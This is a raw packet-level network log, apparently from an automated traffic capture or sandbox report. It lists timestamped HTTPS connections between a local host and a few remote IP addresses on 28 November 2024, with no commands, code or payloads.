                                                                                                                                          Nov 28, 2024 11:33:13.588130951 CET4434987913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.588579893 CET49879443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:13.588583946 CET4434987913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.598340034 CET443498495.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.598381996 CET443498495.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.598438025 CET49849443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.598459959 CET443498495.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.651537895 CET49849443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.687895060 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.688350916 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.688388109 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.688720942 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.689066887 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.689127922 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.689240932 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.735331059 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.836069107 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.836091995 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.836098909 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.836196899 CET49878443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.836219072 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.884458065 CET49878443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:13.917148113 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.917157888 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:13.917233944 CET49878443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.011847973 CET4434987713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.011939049 CET4434987713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.012017012 CET49877443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.013067961 CET49877443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.013067961 CET49877443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.013087034 CET4434987713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.013096094 CET4434987713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.016001940 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.016031027 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.019119024 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.019285917 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.019300938 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.021929979 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.021938086 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.021991014 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.022022009 CET49878443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.022033930 CET49878443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.022458076 CET49878443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.022464991 CET443498785.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.024219990 CET4434987913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.024276972 CET4434987913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.024338961 CET49879443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.024478912 CET49879443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.024478912 CET49879443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.024486065 CET4434987913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.024492025 CET4434987913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.026228905 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.026237011 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.026974916 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.027201891 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.027213097 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.027551889 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.027556896 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.029541016 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.029818058 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.029829025 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.270086050 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.270109892 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.270200968 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.270243883 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.316349983 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.347244978 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.347253084 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.347373009 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.364110947 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.381633043 CET49881443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.381664991 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.392921925 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.435043097 CET49882443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.460220098 CET49881443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.460247040 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.461993933 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.462069035 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.479017019 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.479078054 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.479091883 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.479126930 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.481398106 CET49882443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.481405973 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.481847048 CET49882443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.481852055 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.482712984 CET49880443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:14.482745886 CET443498805.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.817630053 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.817712069 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.817759991 CET49881443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.817943096 CET49881443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.817962885 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.817979097 CET49881443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.817987919 CET4434988113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.820924997 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.820947886 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.821014881 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.821137905 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.821150064 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.836793900 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.836843967 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.836890936 CET49882443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.837044001 CET49882443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.837057114 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.837068081 CET49882443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.837073088 CET4434988213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.841090918 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.841118097 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.841169119 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.841353893 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.841368914 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.888278961 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.888773918 CET49883443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.888813019 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:14.889256001 CET49883443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:14.889266968 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.000632048 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.000926971 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.000943899 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.001358986 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.001678944 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.001746893 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.001806974 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.043339014 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.333421946 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.333488941 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.333553076 CET49883443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.333726883 CET49883443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.333751917 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.333762884 CET49883443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.333770037 CET4434988313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.336791039 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.336811066 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.336899042 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.337064981 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.337078094 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.525562048 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.525882959 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.525897026 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.526324987 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.526648998 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.526715994 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.527331114 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.570223093 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.570251942 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.570337057 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.570347071 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.571335077 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.610652924 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.653450012 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.653520107 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.758773088 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.758848906 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.790591955 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.790653944 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.809581041 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.810235977 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.810245037 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.810805082 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:15.810808897 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.815798998 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.815865993 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.854545116 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.854607105 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.858757019 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.858807087 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.858815908 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.858845949 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.858880997 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.858958006 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.858964920 CET443498845.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.858975887 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.859009981 CET49884443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.859447002 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.859461069 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:15.859522104 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.860146046 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:15.860158920 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.113372087 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.113439083 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.113497019 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:16.113509893 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.121840000 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.121897936 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:16.121905088 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.121916056 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.121963024 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:16.122277021 CET49886443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:16.122283936 CET443498865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.253762007 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.253820896 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.253904104 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.260099888 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.260113955 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.260123968 CET49887443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.260128975 CET4434988713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.263761997 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.263796091 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.263859034 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.264028072 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.264044046 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.408806086 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.408868074 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.409056902 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:16.669236898 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.669800997 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.669822931 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.670268059 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.670272112 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.688869953 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.689579964 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.689599991 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.690076113 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:16.690082073 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:16.995083094 CET49790443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.039341927 CET443497905.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.123761892 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.123825073 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.123910904 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.124155045 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.124166012 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.124175072 CET49888443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.124180079 CET4434988813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.126914024 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.126960039 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.127115965 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.127223969 CET49893443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.127239943 CET4434989313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.142380953 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.142453909 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.142627001 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.142657042 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.142676115 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.142689943 CET49889443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.142697096 CET4434988913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.144776106 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.144804955 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.144876957 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.145031929 CET49894443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.145045996 CET4434989413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.182238102 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.182634115 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.182651997 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.183584929 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.183590889 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.270665884 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.274158001 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.274173021 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.275703907 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.276073933 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.276189089 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.276256084 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.323334932 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.481448889 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:17.481471062 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.567723036 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.568543911 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.568563938 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.569019079 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.569025993 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.636811018 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.636878967 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.636929035 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.637170076 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.637176037 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.637193918 CET49890443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.637198925 CET4434989013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.640219927 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.640256882 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.640379906 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.640475035 CET49895443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.640486956 CET4434989513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.821206093 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.821233034 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.821305990 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.821333885 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.821398020 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.822433949 CET49891443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.822442055 CET443498915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.822798967 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.822834015 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.822890997 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.824039936 CET49896443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:17.824057102 CET443498965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.979047060 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.979569912 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.979590893 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:17.980753899 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:17.980760098 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.012809992 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.012870073 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.012944937 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.013107061 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.013113022 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.013129950 CET49885443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.013134003 CET4434988513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.016030073 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.016062975 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.016156912 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.016335011 CET49897443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.016347885 CET4434989713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.455688000 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.455749989 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.455822945 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.456001043 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.456020117 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.456029892 CET49892443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:18.456036091 CET4434989213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:18.458949089 CET49898443192.168.2.413.107.246.63
